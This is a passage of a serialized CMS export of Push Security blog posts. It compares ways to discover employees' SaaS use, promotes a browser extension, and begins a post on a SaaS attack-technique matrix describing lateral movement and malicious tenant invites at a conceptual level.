start.",{"data":320498,"content":320499,"nodeType":169},{},[320500],{"data":320501,"marks":320502,"value":320503,"nodeType":173},{},[],"Network-level",{"data":320505,"content":320506,"nodeType":178},{},[320507,320510],{"data":320508,"marks":320509,"value":13836,"nodeType":173},{},[],{"data":320511,"marks":320512,"value":320514,"nodeType":173},{},[320513],{"type":1646},"Summary: Network level data is the standard old-school approach. If you already have great network monitoring in place it provides fairly broad visibility. There are some very key limitations especially around inferring usage from access, as well as outside the office visibility problems.",{"data":320516,"content":320517,"nodeType":178},{},[320518],{"data":320519,"marks":320520,"value":320521,"nodeType":173},{},[],"SaaS apps are accessed over a network - and so that seems like a sensible place to start looking for them. What if we just tried looking for all users accessing a SaaS app’s website? Let’s say we want to see if anyone is using e.g. Dropbox, so we do a Google search for all Dropbox domains and we find Dropbox.com, and a few regional domains as well. We then set about finding employees accessing those domains in our network logs - simple! Perhaps not so much…",{"data":320523,"content":320524,"nodeType":178},{},[320525,320529,320533,320537,320542,320546,320550,320554,320558],{"data":320526,"marks":320527,"value":320528,"nodeType":173},{},[],"As we mentioned in the intro, the best outcome you can hope for is to uncover SaaS ",{"data":320530,"marks":320531,"value":320462,"nodeType":173},{},[320532],{"type":1646},{"data":320534,"marks":320535,"value":320536,"nodeType":173},{},[],", not ",{"data":320538,"marks":320539,"value":320541,"nodeType":173},{},[320540],{"type":1646},"usage.",{"data":320543,"marks":320544,"value":320545,"nodeType":173},{},[]," This might seem like a subtle difference, but SaaS usage is what you want to find, not just information about which employees visited a SaaS website. If you’re looking at all app ",{"data":320547,"marks":320548,"value":320462,"nodeType":173},{},[320549],{"type":1646},{"data":320551,"marks":320552,"value":320553,"nodeType":173},{},[],", you’ll wind up with a massive list of SaaS, with only a portion of it indicating SaaS ",{"data":320555,"marks":320556,"value":320471,"nodeType":173},{},[320557],{"type":1646},{"data":320559,"marks":320560,"value":1477,"nodeType":173},{},[],{"data":320562,"content":320563,"nodeType":178},{},[320564,320568,320573,320577,320582],{"data":320565,"marks":320566,"value":320567,"nodeType":173},{},[],"Since you can’t discover app ",{"data":320569,"marks":320570,"value":320572,"nodeType":173},{},[320571],{"type":1646},"usage ",{"data":320574,"marks":320575,"value":320576,"nodeType":173},{},[],"with network data, you’d have to tie network traffic to a single employee to identify the user, then reach out to each employee to understand the business context of how they’re using the app. A network data approach can work ",{"data":320578,"marks":320579,"value":320581,"nodeType":173},{},[320580],{"type":1646},"if",{"data":320583,"marks":320584,"value":320585,"nodeType":173},{},[]," you have time to get that context by asking employees if they’re using the SaaS detected or by corroborating your findings with subscription invoices from the finance team. ",{"data":320587,"content":320588,"nodeType":178},{},[320589],{"data":320590,"marks":320591,"value":320592,"nodeType":173},{},[],"A few ways to collect SaaS data on the network level are ingesting firewall, web proxy and DNS and VPN logs. These inputs can give you some additional visibility into SaaS access, but you may still be left with significant blind spots to actual usage if you assume it all takes place on the corporate network using a VPN. It’s also a painfully tedious process. That said, a manual process still is better than having no SaaS visibility at all. ",{"data":320594,"content":320595,"nodeType":169},{},[320596],{"data":320597,"marks":320598,"value":320599,"nodeType":173},{},[],"Endpoint-level",{"data":320601,"content":320602,"nodeType":178},{},[320603,320608,320611],{"data":320604,"marks":320605,"value":320607,"nodeType":173},{},[320606],{"type":1646},"Summary: Endpoint",{"data":320609,"marks":320610,"value":3107,"nodeType":173},{},[],{"data":320612,"marks":320613,"value":320615,"nodeType":173},{},[320614],{"type":1646},"data is hard to get, and of limited value. However, it may be useful if you already have this data available in a SIEM or if it’s otherwise easy to query.",{"data":320617,"content":320618,"nodeType":178},{},[320619],{"data":320620,"marks":320621,"value":320622,"nodeType":173},{},[],"Perhaps we’ll get closer to what we need (usage data instead of just access data and a low false positive rate) if we move up a level and get closer to the users? Users are going to be accessing the SaaS apps through some kind of endpoint and there are some things you could use to do discovery if you have some monitoring capability on that endpoint.",{"data":320624,"content":320625,"nodeType":178},{},[320626],{"data":320627,"marks":320628,"value":320629,"nodeType":173},{},[],"For example, many SaaS apps have desktop or mobile clients (thick clients) you install. You could look for e.g. the Slack client, or the OneDrive sync agent installed on the endpoint. However, many users prefer the in-browser version, so they may not have even installed the thick client and you wouldn’t see their usage by looking at their endpoint data. ",{"data":320631,"content":320632,"nodeType":178},{},[320633,320637,320642],{"data":320634,"marks":320635,"value":320636,"nodeType":173},{},[],"All the good data, the application level data, is in the browser, which is technically on the endpoint but not really accessible ",{"data":320638,"marks":320639,"value":320641,"nodeType":173},{},[320640],{"type":1646},"through the endpoint",{"data":320643,"marks":320644,"value":320645,"nodeType":173},{},[]," without doing something very hacky. Perhaps we need to go a level deeper - either closer to the application or get inside the browser.",{"data":320647,"content":320648,"nodeType":169},{},[320649],{"data":320650,"marks":320651,"value":320652,"nodeType":173},{},[],"Application-level",{"data":320654,"content":320655,"nodeType":178},{},[320656],{"data":320657,"marks":320658,"value":320660,"nodeType":173},{},[320659],{"type":1646},"Summary: Application level integrations are very useful for discovering unsanctioned SaaS apps that are integrated with the SaaS apps you already know about. But when used in isolation, they have massive blind spots. Application-level data is also a goldmine for finding out how securely employees use the app.",{"data":320662,"content":320663,"nodeType":178},{},[320664,320668,320673],{"data":320665,"marks":320666,"value":320667,"nodeType":173},{},[],"Focusing on the SaaS app directly makes a lot of sense if you need to get really high quality usage data. The challenge is that you need to integrate with the SaaS app to get at this data. And you can’t just integrate with an app like Slack or Trello. In general, these integrations must be within a specific account or tenant that your employees are using if you want to see any of their usage or security data. So, if you must already know about the tenant to discover the SaaS - is this approach useless for detecting unknown SaaS? Maybe, ",{"data":320669,"marks":320670,"value":320672,"nodeType":173},{},[320671],{"type":1646},"but ",{"data":320674,"marks":320675,"value":320676,"nodeType":173},{},[],"there are some very useful edge cases.",{"data":320678,"content":320679,"nodeType":178},{},[320680],{"data":320681,"marks":320682,"value":320683,"nodeType":173},{},[],"For instance, integrations with SaaS apps that are known and sanctioned can be very useful, especially with those apps that are identity providers, like Microsoft Azure/365 and Google Workspace. Lots of SaaS apps let users login with another SaaS app, which is called social login or sometimes single sign-on (SSO). When a user does “login using Google” on Salesforce using their corporate Google account, they are actually integrating (in a very limited way) Salesforce with Google Workspace. If you have application-level access (normally by calling the APIs) to known SaaS apps, you can discover these social logins (among other) integrations with other SaaS apps. These SaaS-to-SaaS links then become very useful as a discovery mechanism.",{"data":320685,"content":320686,"nodeType":178},{},[320687],{"data":320688,"marks":320689,"value":320690,"nodeType":173},{},[],"Something else to keep in mind, application-level access to known SaaS can also be incredibly useful for security beyond simple SaaS discovery. You could check authentication controls, like which users don’t have MFA enabled, sharing settings (perhaps the SaaS allows you to share documents publicly), unusual login events, other anomalous behavior, and so on. ",{"data":320692,"content":320693,"nodeType":169},{},[320694],{"data":320695,"marks":320696,"value":320697,"nodeType":173},{},[],"Browser-level  ",{"data":320699,"content":320700,"nodeType":178},{},[320701],{"data":320702,"marks":320703,"value":320705,"nodeType":173},{},[320704],{"type":1646},"Summary: Browser data is as good as you can get for SaaS discovery, but with the downside that you must build and deploy a browser extension to get at it.",{"data":320707,"content":320708,"nodeType":178},{},[320709],{"data":320710,"marks":320711,"value":320712,"nodeType":173},{},[],"What if I told you, you could get application level usage-data beyond what events the applications expose through their APIs without needing to know about the app first or fighting network encryption? The other methods in this guide allow you to get at the data using normal log processing techniques, SIEM queries, or even hacky scripts that call APIs, but there’s one reasonable option for SaaS discovery.",{"data":320714,"content":320715,"nodeType":178},{},[320716],{"data":320717,"marks":320718,"value":320719,"nodeType":173},{},[],"The only real viable way to get at this SaaS usage data is through a browser extension. The big hurdle with this approach is that browser extensions require you to develop an extension and a backend where it can send data…AND you need to deploy that extension to all employees. ",{"data":320721,"content":320722,"nodeType":178},{},[320723],{"data":320724,"marks":320725,"value":320726,"nodeType":173},{},[],"Deploying that browser extension might be as simple as setting the extension to default install itself in all managed browsers - that’s possible if you’re using Google Workspace. In other environments, it may be a bit more of a challenge. Fortunately, browser extensions don’t have the complexity of normal endpoint agents. They don’t have runtime dependencies, aren’t platform dependent, don’t need admin permissions to install, have automatic update mechanisms built-in, and don’t affect performance. At the end of the day, they’re just a special piece of JavaScript running in the browser.",{"data":320728,"content":320729,"nodeType":178},{},[320730,320734,320738,320742,320750],{"data":320731,"marks":320732,"value":320733,"nodeType":173},{},[],"If you ",{"data":320735,"marks":320736,"value":221172,"nodeType":173},{},[320737],{"type":370},{"data":320739,"marks":320740,"value":320741,"nodeType":173},{},[]," able to get access to the data in the browser (spoiler alert: we provide an easy - and free - out-of-the-box ",{"data":320743,"content":320745,"nodeType":186},{"uri":320744},"/features/saas-discovery/",[320746],{"data":320747,"marks":320748,"value":320749,"nodeType":173},{},[],"browser extension for SaaS discovery",{"data":320751,"marks":320752,"value":320753,"nodeType":173},{},[],"), there is almost limitless scope to what you can do with this data. You can observe not only access to SaaS websites, you can also see:",{"data":320755,"content":320756,"nodeType":250},{},[320757,320767,320777,320787,320797,320807],{"data":320758,"content":320759,"nodeType":254},{},[320760],{"data":320761,"content":320762,"nodeType":178},{},[320763],{"data":320764,"marks":320765,"value":320766,"nodeType":173},{},[],"the user login,",{"data":320768,"content":320769,"nodeType":254},{},[320770],{"data":320771,"content":320772,"nodeType":178},{},[320773],{"data":320774,"marks":320775,"value":320776,"nodeType":173},{},[],"whether that login was successful,",{"data":320778,"content":320779,"nodeType":254},{},[320780],{"data":320781,"content":320782,"nodeType":178},{},[320783],{"data":320784,"marks":320785,"value":320786,"nodeType":173},{},[],"whether they used MFA to login, ",{"data":320788,"content":320789,"nodeType":254},{},[320790],{"data":320791,"content":320792,"nodeType":178},{},[320793],{"data":320794,"marks":320795,"value":320796,"nodeType":173},{},[],"which email they used to login, ",{"data":320798,"content":320799,"nodeType":254},{},[320800],{"data":320801,"content":320802,"nodeType":178},{},[320803],{"data":320804,"marks":320805,"value":320806,"nodeType":173},{},[],"whether they are the owner/administrator of the SaaS app tenant, and ",{"data":320808,"content":320809,"nodeType":254},{},[320810],{"data":320811,"content":320812,"nodeType":178},{},[320813],{"data":320814,"marks":320815,"value":320816,"nodeType":173},{},[],"all their behavior and settings in the app. ",{"data":320818,"content":320819,"nodeType":178},{},[320820],{"data":320821,"marks":320822,"value":320823,"nodeType":173},{},[],"Best of all, there is no need to stream all this data to a single collection point where it becomes a privacy nightmare. By writing rules in the extension to look for specific issues, you can flag only security relevant events, redacted or anonymized as far as makes sense. You can even limit the scope to only monitor the app use when the employee logs into the SaaS app using their work account to further avoid employee privacy concerns. ",{"data":320825,"content":320826,"nodeType":178},{},[320827],{"data":320828,"marks":320829,"value":320830,"nodeType":173},{},[],"There’s a quick and easy solution to get the best out of the application and browser data approaches we’ve written about in the last two sections - and that’s with our free tool.",{"data":320832,"content":320833,"nodeType":169},{},[320834],{"data":320835,"marks":320836,"value":309064,"nodeType":173},{},[],{"data":320838,"content":320839,"nodeType":178},{},[320840,320844,320849],{"data":320841,"marks":320842,"value":320843,"nodeType":173},{},[],"We found that the most comprehensive approach is to collect data from ",{"data":320845,"marks":320846,"value":320848,"nodeType":173},{},[320847],{"type":1646},"both ",{"data":320850,"marks":320851,"value":320852,"nodeType":173},{},[],"the application and browser level to give you full visibility and actionable security information. With our browser extension, we get full breadth of coverage so you can discover all SaaS usage and with our APIs, you get the depth of coverage you need to understand how employees are using SaaS and if they’re doing so securely. Our combined approach captures SaaS logins and adoption, in real-time, and provides the best visibility and context for security teams. ",{"data":320854,"content":320855,"nodeType":235},{},[320856],{"data":320857,"marks":320858,"value":320859,"nodeType":173},{},[],"Fixing SaaS security issues automatically by partnering with employees  ",{"data":320861,"content":320862,"nodeType":178},{},[320863,320867,320872],{"data":320864,"marks":320865,"value":320866,"nodeType":173},{},[],"\nWhat we then do with that data is where the magic happens… we can automatically guide employees via ChatOps (Slack and Teams for now, more to come!) to improve SaaS security. Some of those messages will help us enrich our data by asking employees questions they’ll actually know the answers to (",{"data":320868,"marks":320869,"value":320871,"nodeType":173},{},[320870],{"type":1646},"“You logged into Slack from Mexico just now. Are you in Mexico?”",{"data":320873,"marks":320874,"value":320875,"nodeType":173},{},[],"), which provides you with a good snapshot of SaaS usage in your business and lets you make informed security decisions about SaaS use to better manage risks.",{"data":320877,"content":320878,"nodeType":178},{},[320879],{"data":320880,"marks":320881,"value":320882,"nodeType":173},{},[],"Employees can also make immediate improvements to your overall security posture. In case you’re curious about what that looks like, some of the prompts we push to employees are things like: ",{"data":320884,"content":320885,"nodeType":178},{},[320886,320891],{"data":320887,"marks":320888,"value":320890,"nodeType":173},{},[320889],{"type":1646},"“We noticed this SaaS app you’re using has access to all your emails, are you still using it?” Y/N.",{"data":320892,"marks":320893,"value":320894,"nodeType":173},{},[]," If not, they can click a button to remove it and you’ll get an immediate reduction of your attack surface. ",{"data":320896,"content":320897,"nodeType":178},{},[320898],{"data":320899,"marks":320900,"value":320901,"nodeType":173},{},[],"Or ",{"data":320903,"content":320904,"nodeType":178},{},[320905,320910,320914,320919],{"data":320906,"marks":320907,"value":320909,"nodeType":173},{},[320908],{"type":1646},"“It looks like you’re not using MFA for your account on this SaaS app. Can we get this set up really quickly?”",{"data":320911,"marks":320912,"value":320913,"nodeType":173},{},[]," or “",{"data":320915,"marks":320916,"value":320918,"nodeType":173},{},[320917],{"type":1646},"An app you installed called ‘Dropbox’ is not the official Dropbox app, click here to remove it and install the verified app instead.”",{"data":320920,"marks":320921,"value":10557,"nodeType":173},{},[],{"data":320923,"content":320927,"nodeType":312},{"target":320924},{"sys":320925},{"id":320926,"type":317,"linkType":318},"27MpbzErmDfAC3bA4dBibv",[],{"data":320929,"content":320930,"nodeType":178},{},[320931,320935,320942],{"data":320932,"marks":320933,"value":320934,"nodeType":173},{},[],"If you’re interested in learning more, check out how we can ",{"data":320936,"content":320937,"nodeType":186},{"uri":320744},[320938],{"data":320939,"marks":320940,"value":320941,"nodeType":173},{},[],"help you discover SaaS use and secure it",{"data":320943,"marks":320944,"value":1477,"nodeType":173},{},[],{"data":320946,"content":320947,"nodeType":178},{},[320948,320952,320959,320962,320968],{"data":320949,"marks":320950,"value":320951,"nodeType":173},{},[],"We’ll also be publishing a SaaS Discovery Evaluation Guide that will explore all the off-the-shelf tools you may consider and evaluate which one is the best fit for your needs as this really does depend on your tech stack. In that, we’ll share our experiences with those products and discuss what additional coverage and context they can provide, as well as where they fall short. Subscribe to our mailing list and follow us on ",{"data":320953,"content":320954,"nodeType":186},{"uri":117883},[320955],{"data":320956,"marks":320957,"value":320958,"nodeType":173},{},[],"Twitter @pushsecurity",{"data":320960,"marks":320961,"value":1464,"nodeType":173},{},[],{"data":320963,"content":320964,"nodeType":186},{"uri":117869},[320965],{"data":320966,"marks":320967,"value":117876,"nodeType":173},{},[],{"data":320969,"marks":320970,"value":320971,"nodeType":173},{},[]," to get a head’s up when that’s live so you can have a read.","We’ve compiled some methods for discovering SaaS. Lets explore each approach and learn new ways to discover unknown SaaS, capture SaaS use, and secure it.",[320974,320975,320976,320977,320978],"itassetdiscovery","saassecurity","saasdiscovery","sass","cloudfirst","2022-05-03T00:00:00.000+01:00",{"items":320981},[320982,320984],{"sys":320983,"name":274157},{"id":274156},{"sys":320985,"name":26137},{"id":26136},{"items":320987},[320988],{"fullName":13977,"firstName":13978,"jobTitle":13979,"profilePicture":320989},{"url":13981},{"items":320991},[320992],{"fullName":8611,"firstName":8612,"jobTitle":8613,"profilePicture":320993},{"url":8615},{"json":320995,"links":321307},{"nodeType":165,"data":320996,"content":320997},{},[320998,321004,321010,321016,321022,321028,321044,321060,321066,321072,321078,321083,321089,321105,321121,321127,321133,321149,321162,321175,321181,321197,321203,321219,321225,321231,321237,321243,321249,321265,321271,321277,321283,321289,321295,321301],{"nodeType":178,"data":320999,"content":321000},{},[321001],{"nodeType":173,"value":314543,"marks":321002,"data":321003},[],{},{"nodeType":178,"data":321005,"content":321006},{},[321007],{"nodeType":173,"value":314550,"marks":321008,"data":321009},[],{},{"nodeType":178,"data":321011,"content":321012},{},[321013],{"nodeType":173,"value":314557,"marks":321014,"data":321015},[],{},{"nodeType":235,"data":321017,"content":321018},{},[321019],{"nodeType":173,"value":258287,"marks":321020,"data":321021},[],{},{"nodeType":178,"data":321023,"content":321024},{},[321025],{"nodeType":173,"value":314570,"marks":321026,"data":321027},[],{},{"nodeType":178,"data":321029,"content":321030},{},[321031,321034,321041],{"nodeType":173,"value":314577,"marks":321032,"data":321033},[],{},{"nodeType":186,"data":321035,"content":321036},{"uri":296916},[321037],{"nodeType":173,"value":314584,"marks":321038,"data":321040},[321039],{"type":194},{},{"nodeType":173,"value":314589,"marks":321042,"data":321043},[],{},{"nodeType":178,"data":321045,"content":321046},{},[321047,321050,321057],{"nodeType":173,"value":314596,"marks":321048,"data":321049},[],{},{"nodeType":186,"data":321051,"content":321052},{"uri":27492},[321053],{"nodeType":173,"value":314603,"marks":321054,"data":321056},[321055],{"type":194},{},{"nodeType":173,"value":314608,"marks":321058,"data":321059},[],{},{"nodeType":178,"data":321061,"content":321062},{},[321063],{"nodeType":173,"value":314615,"marks":321064,"data":321065},[],{},{"nodeType":235,"data":321067,"content":321068},{},[321069],{"nodeType":173,"value":314622,"marks":321070,"data":321071},[],{},{"nodeType":178,"data":321073,"content":321074},{},[321075],{"nodeType":173,"value":314629,"marks":321076,"data":321077},[],{},{"nodeType":312,"data":321079,"content":321082},{"target":321080},{"sys":321081},{"id":308832,"type":317,"linkType":318},[],{"nodeType":178,"data":321084,"content":321085},{},[321086],{"nodeType":173,"value":314641,"marks":321087,"data":321088},[],{},{"nodeType":178,"data":321090,"content":321091},{},[321092,321095,321102],{"nodeType":173,"value":314648,"marks":321093,"data":321094},[],{},{"nodeType":186,"data":321096,"content":321097},{"uri":296864},[321098],{"nodeType":173,"value":314655,"marks":321099,"data":321101},[321100],{"type":194},{},{"nodeType":173,"value":10557,"marks":321103,"data":321104},[],{},{"nodeType":178,"data":321106,"content":321107},{},[321108,321111,321118],{"nodeType":173,"value":314666,"marks":321109,"data":321110},[],{},{"nodeType":186,"data":321112,"content":321113},{"uri":314671},[321114],{"nodeType":173,"value":314674,"marks":321115,"data":321117},[321116],{"type":194},{},{"nodeType":173,"value":314679,"marks":321119,"data":321120},[],{},{"nodeType":178,"data":321122,"content":321123},{},[321124],{"nodeType":173,"value":314686,"marks":321125,"data":321126},[],{},{"nodeType":235,"data":321128,"content":321129},{},[321130],{"nodeType":173,"value":314693,"marks":321131,"data":321132},[],{},{"nodeType":178,"data":321134,"content":321135},{},[321136,321139,321146],{"nodeType":173,"value":314700,"marks":321137,"data":321138},[],{},{"nodeType":186,"data":321140,"content":321141},{"uri":314705},[321142],{"nodeType":173,"value":314708,"marks":321143,"data":321145},[321144],{"type":194},{},{"nodeType":173,"value":314713,"marks":321147,"data":321148},[],{},{"nodeType":178,"data":321150,"content":321151},{},[321152,321155,321159],{"nodeType":173,"value":314720,"marks":321153,"data":321154},[],{},{"nodeType":173,"value":314724,"marks":321156,"data":321158},[321157],{"type":1646},{},{"nodeType":173,"value":314729,"marks":321160,"data":321161},[],{},{"nodeType":178,"data":321163,"content":321164},{},[321165,321168,321172],{"nodeType":173,"value":314736,"marks":321166,"data":321167},[],{},{"nodeType":173,"value":314740,"marks":321169,"data":321171},[321170],{"type":370},{},{"nodeType":173,"value":314745,"marks":321173,"data":321174},[],{},{"nodeType":235,"data":321176,"content":321177},{},[321178],{"nodeType":173,"value":314752,"marks":321179,"data":321180},[],{},{"nodeType":178,"data":321182,"content":321183},{},[321184,321187,321194],{"nodeType":173,"value":314759,"marks":321185,"data":321186},[],{},{"nodeType":186,"data":321188,"content":321189},{"uri":314764},[321190],{"nodeType":173,"value":314767,"marks":321191,"data":321193},[321192],{"type":194},{},{"nodeType":173,"value":314772,"marks":321195,"data":321196},[],{},{"nodeType":178,"data":321198,"content":321199},{},[321200],{"nodeType":173,"value":314779,"marks":321201,"data":321202},[],{},{"nodeType":178,"data":321204,"content":321205},{},[321206,321209,321216],{"nodeType":173,"value":314786,"marks":321207,"data":321208},[],{},{"nodeType":186,"data":321210,"content":321211},{"uri":296864},[321212],{"nodeType":173,"value":314793,"marks":321213,"data":321215},[321214],{"type":194},{},{"nodeType":173,"value":314798,"marks":321217,"data":321218},[],{},{"nodeType":178,"data":321220,"content":321221},{},[321222],{"nodeType":173,"value":314805,"marks":321223,"data":321224},[],{},{"nodeType":235,"data":321226,"content":321227},{},[321228],{"nodeType":173,"value":314812,"marks":321229,"data":321230},[],{},{"nodeType":178,"data":321232,"content":321233},{},[321234],{"nodeType":173,"value":314819,"marks":321235,"data":321236},[],{},{"nodeType":178,"data":321238,"content":321239},{},[321240],{"nodeType":173,"value":314826,"marks":321241,"data":321242},[],{},{"nodeType":178,"data":321244,"content":321245},{},[321246],{"nodeType":173,"value":314833,"marks":321247,"data":321248},[],{},{"nodeType":178,"data":321250,"content":321251},{},[321252,321255,321262],{"nodeType":173,"value":314840,"marks":321253,"data":321254},[],{},{"nodeType":186,"data":321256,"content":321257},{"uri":314845},[321258],{"nodeType":173,"value":28052,"marks":321259,"data":321261},[321260],{"type":194},{},{"nodeType":173,"value":197,"marks":321263,"data":321264},[],{},{"nodeType":235,"data":321266,"content":321267},{},[321268],{"nodeType":173,"value":314858,"marks":321269,"data":321270},[],{},{"nodeType":178,"data":321272,"content":321273},{},[321274],{"nodeType":173,"value":314865,"marks":321275,"data":321276},[],{},{"nodeType":178,"data":321278,"content":321279},{},[321280],{"nodeType":173,"value":314872,"marks":321281,"data":321282},[],{},{"nodeType":178,"data":321284,"content":321285},{},[321286],{"nodeType":173,"value":314879,"marks":321287,"data":321288},[],{},{"nodeType":178,"data":321290,"content":321291},{},[321292],{"nodeType":173,"value":314886,"marks":321293,"data":321294},[],{},{"nodeType":235,"data":321296,"content":321297},{},[321298],{"nodeType":173,"value":40632,"marks":321299,"data":321300},[],{},{"nodeType":178,"data":321302,"content":321303},{},[321304],{"nodeType":173,"value":314899,"marks":321305,"data":321306},[],{},{"entries":321308},{"hyperlink":321309,"inline":321310,"block":321311},[],[],[321312],{"sys":321313,"__typename":5345,"title":313206,"caption":313207,"layoutMode":112585,"file":321314},{"id":308832},{"url":313209,"width":313210,"height":313211},"content:blog:want-to-discover-the-full-extent-of-your-saas-sprawl-embrace-browser.json","blog/want-to-discover-the-full-extent-of-your-saas-sprawl-embrace-browser.json","blog/want-to-discover-the-full-extent-of-your-saas-sprawl-embrace-browser",{"_path":321319,"_dir":1500,"_draft":6,"_partial":6,"_locale":37,"sys":321320,"ogImage":118,"summary":321323,"title":321334,"subtitle":118,"metaTitle":321335,"synopsis":321336,"hashTags":118,"publishedDate":321337,"slug":321338,"content":321339,"tagsCollection":322013,"relatedBlogPostsCollection":322019,"authorsCollection":322637,"_id":322641,"_type":5439,"_source":5440,"_file":322642,"_stem":322643,"_extension":5439},"/blog/embrace-saas-to-move-faster-than-your-competitors",{"id":321321,"publishedAt":321322},"6tC3Xqkq7kdTMOvqLMEafp","2025-04-28T18:09:28.631Z",{"json":321324},{"data":321325,"content":321326,"nodeType":165},{},[321327],{"data":321328,"content":321329,"nodeType":178},{},[321330],{"data":321331,"marks":321332,"value":321333,"nodeType":173},{},[],"One of the questions we hear all the time is, “Can’t I just block my employees from using SaaS that my team hasn’t already vetted and approved?” And the answer is “Yes, you can. You can certainly block the apps we find your employees using, but the real question is ‘Should you?’”","Embrace SaaS to move faster than your competitors","Move faster than competitors by embracing SaaS","Look at enabling SaaS from a broader understanding of the business and not just the impact to security","2023-04-21T00:00:00.000Z","embrace-saas-to-move-faster-than-your-competitors",{"json":321340,"links":322008},{"nodeType":165,"data":321341,"content":321342},{},[321343,321350,321357,321363,321370,321387,321394,321432,321439,321445,321482,321498,321505,321511,321517,321534,321551,321558,321591,321597,321614,321620,321626,321652,321668,321674,321680,321687,321694,321700,321707,321714,321721,321727,321734,321740,321746,321752,321766,321772,321829,321836,321843,321868,321882,321889,321895,321902,321929,321947,321954,321960,321967,321974,321991],{"nodeType":178,"data":321344,"content":321345},{},[321346],{"nodeType":173,"value":321347,"marks":321348,"data":321349},"Our goal at Push is simple - to reduce the risk of using SaaS apps at work. Doing this well means building controls that are easy to use, easy to understand - and ultimately effective. Not just effective against the hand-wavy concept of “SaaS attacks” but specific techniques –the most common techniques that are likely to cause real damage.",[],{},{"nodeType":178,"data":321351,"content":321352},{},[321353],{"nodeType":173,"value":321354,"marks":321355,"data":321356},"To talk about this, we need to have a shared understanding of what these techniques are. To get that conversation going we’ve pulled together all the techniques we're aware of, and our research team has even added a bunch of new ones.",[],{},{"nodeType":169,"data":321358,"content":321359},{},[321360],{"nodeType":173,"value":208375,"marks":321361,"data":321362},[],{},{"nodeType":178,"data":321364,"content":321365},{},[321366],{"nodeType":173,"value":321367,"marks":321368,"data":321369},"We’ve taken inspiration from the MITRE ATT&CK framework (certainly intended as the sincerest form of flattery), but wanted to make a conscious break away from the endpoint-focused ATT&CK techniques and instead focus on techniques that are SaaS-specific. In fact, these techniques don’t touch endpoints (so they bypass EDR) or customer networks (so  they bypass network detection) - so we’re calling them networkless attacks.",[],{},{"nodeType":178,"data":321371,"content":321372},{},[321373,321377,321384],{"nodeType":173,"value":321374,"marks":321375,"data":321376},"You can find more detailed descriptions of these techniques (and hopefully PR’s for some we missed) on ",[],{},{"nodeType":186,"data":321378,"content":321379},{"uri":88239},[321380],{"nodeType":173,"value":197982,"marks":321381,"data":321383},[321382],{"type":194},{},{"nodeType":173,"value":37,"marks":321385,"data":321386},[],{},{"nodeType":178,"data":321388,"content":321389},{},[321390],{"nodeType":173,"value":321391,"marks":321392,"data":321393},"Since we’re not targeting endpoints, let’s talk about the new targets: the accounts/identities on SaaS apps. We found it was useful to not think about these identities as stand-alone isolated islands - they are much more like a graph; less a single web-server on the internet and more like many Windows endpoints on an Active Directory. ",[],{},{"nodeType":178,"data":321395,"content":321396},{},[321397,321401,321408,321411,321418,321422,321429],{"nodeType":173,"value":321398,"marks":321399,"data":321400},"You can leverage this access to an identity on a trusted platform to target (so laterally more or escalate privilege to) other users or identities. For example, attacks like using access to SaaS apps to ",[],{},{"nodeType":186,"data":321402,"content":321403},{"uri":106815},[321404],{"nodeType":173,"value":208426,"marks":321405,"data":321407},[321406],{"type":194},{},{"nodeType":173,"value":933,"marks":321409,"data":321410},[],{},{"nodeType":186,"data":321412,"content":321413},{"uri":208435},[321414],{"nodeType":173,"value":208438,"marks":321415,"data":321417},[321416],{"type":194},{},{"nodeType":173,"value":321419,"marks":321420,"data":321421}," to social engineer them there - or perhaps ",[],{},{"nodeType":186,"data":321423,"content":321424},{"uri":162296},[321425],{"nodeType":173,"value":208450,"marks":321426,"data":321428},[321427],{"type":194},{},{"nodeType":173,"value":208455,"marks":321430,"data":321431},[],{},{"nodeType":178,"data":321433,"content":321434},{},[321435],{"nodeType":173,"value":321436,"marks":321437,"data":321438},"In this case, unusually, it’s not the data in these hundreds of SaaS apps that create risk, and you need to consider low-risk (from a data perspective) apps as a vector to pivot to higher risk apps in your estate.",[],{},{"nodeType":235,"data":321440,"content":321441},{},[321442],{"nodeType":173,"value":208469,"marks":321443,"data":321444},[],{},{"nodeType":178,"data":321446,"content":321447},{},[321448,321451,321458,321461,321468,321472,321479],{"nodeType":173,"value":208476,"marks":321449,"data":321450},[],{},{"nodeType":186,"data":321452,"content":321453},{"uri":184680},[321454],{"nodeType":173,"value":182807,"marks":321455,"data":321457},[321456],{"type":194},{},{"nodeType":173,"value":933,"marks":321459,"data":321460},[],{},{"nodeType":186,"data":321462,"content":321463},{"uri":197109},[321464],{"nodeType":173,"value":197114,"marks":321465,"data":321467},[321466],{"type":194},{},{"nodeType":173,"value":321469,"marks":321470,"data":321471}," that get you initial access to SaaS apps are fairly well known - because they work and are widely used. We’re also starting to see tools and attacks that suggest ",[],{},{"nodeType":186,"data":321473,"content":321474},{"uri":197770},[321475],{"nodeType":173,"value":208504,"marks":321476,"data":321478},[321477],{"type":194},{},{"nodeType":173,"value":208509,"marks":321480,"data":321481},[],{},{"nodeType":178,"data":321483,"content":321484},{},[321485,321488,321495],{"nodeType":173,"value":208516,"marks":321486,"data":321487},[],{},{"nodeType":186,"data":321489,"content":321490},{"uri":208521},[321491],{"nodeType":173,"value":208524,"marks":321492,"data":321494},[321493],{"type":194},{},{"nodeType":173,"value":208529,"marks":321496,"data":321497},[],{},{"nodeType":178,"data":321499,"content":321500},{},[321501],{"nodeType":173,"value":321502,"marks":321503,"data":321504},"SaaS apps allow anyone to name app tenants (a.k.a. spaces, teams, or instances) anything they like - including your company name. Attackers send invites to your employees from within the app with a customized message explaining why they should join this new tenant (or sign up to the app if they are not already a user). ",[],{},{"nodeType":178,"data":321506,"content":321507},{},[321508],{"nodeType":173,"value":208543,"marks":321509,"data":321510},[],{},{"nodeType":235,"data":321512,"content":321513},{},[321514],{"nodeType":173,"value":208550,"marks":321515,"data":321516},[],{},{"nodeType":178,"data":321518,"content":321519},{},[321520,321523,321530],{"nodeType":173,"value":208557,"marks":321521,"data":321522},[],{},{"nodeType":186,"data":321524,"content":321525},{"uri":208562},[321526],{"nodeType":173,"value":208565,"marks":321527,"data":321529},[321528],{"type":194},{},{"nodeType":173,"value":321531,"marks":321532,"data":321533}," (Living-Off-the-Land Binaries and Scripts), which are often signed Microsoft utilities. Perhaps the most well-known example is executing scripts through PowerShell rather than building custom malware. That isn’t as useful these days but there was a time when PowerShell was routinely used to bypass AV, EDR, and even app allow-listing.",[],{},{"nodeType":178,"data":321535,"content":321536},{},[321537,321541,321548],{"nodeType":173,"value":321538,"marks":321539,"data":321540},"In that same living-off-the-land mindset, an attacker trying to maintain access to each SaaS app they compromise using custom OAuth integration apps, might instead choose to use legit SaaS apps that specialize in workflow automation to create 